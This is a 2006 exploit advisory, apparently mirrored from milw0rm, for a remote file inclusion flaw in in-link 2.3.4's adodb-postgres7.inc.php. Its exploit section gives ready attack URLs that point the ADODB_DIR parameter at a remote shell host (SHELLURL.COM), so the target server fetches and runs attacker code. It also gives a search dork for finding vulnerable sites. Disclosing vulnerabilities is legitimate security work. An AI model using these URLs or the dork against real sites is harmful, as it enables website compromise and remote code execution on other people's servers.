Security Advisory: in-link <=2.3.4 (adodb-postgres7.inc.php) Remote File Inclusion Exploit

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  SimpleBlog <= 2.3 (id) Remote SQL Injection Vulnerability
  The Amazing Little Poll Admin Pwd
  [SA21653] PHP-Nuke MyHeadlines Module "myh_op" Cross-Site Scripting
  [SA21742] microforum "members.
dat" Exposure of User Credentials

From: Saudi Hackrz <Saudi.Unix_(at)_Hotmail.com>
Date: 04.09.2006
Subject: in-link <=2.3.4 (adodb-postgres7.inc.php) Remote File Inclusion Exploit

#=================================================================
#in-link <=2.3.4 (adodb-postgres7.inc.php) Remote File Inclusion Exploit
#================================================================
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#http://www.in-portal.net/
#http://www.in-portal.net/products/in-link.html
#=================================================================
#Script Name: in-link 2.3.4
#Script <<<<<<<<<< $$ $$
http://www.bwady.net/script/pafiledb.php?action=download&id=4
#Dork :"by in-link" or "Powered by In-Link 2."
#
#=================================================================
#Bug in : adodb-postgres7.inc.php
#        include_once($ADODB_DIR."/adodb-postgres.inc.php");
#includes/adodb/back/adodb-postgres7.inc.php
#
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[path]/includes/adodb/back/adodb-postgres7.inc.
php?ADODB_DIR=http://SHELLURL.COM?
#Or
#http://sitename.com/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=http:
//SHELLURL.COM?
#
#===============================================================================

#Discoverd By : Saudi Hackrz
#
#Conatact : Saudi.unix[at]hotmail.com
#
#GreetZ : Le CoPrA And All My Frind
#www.S3hr.com

# milw0rm.com [2006-09-04]

test server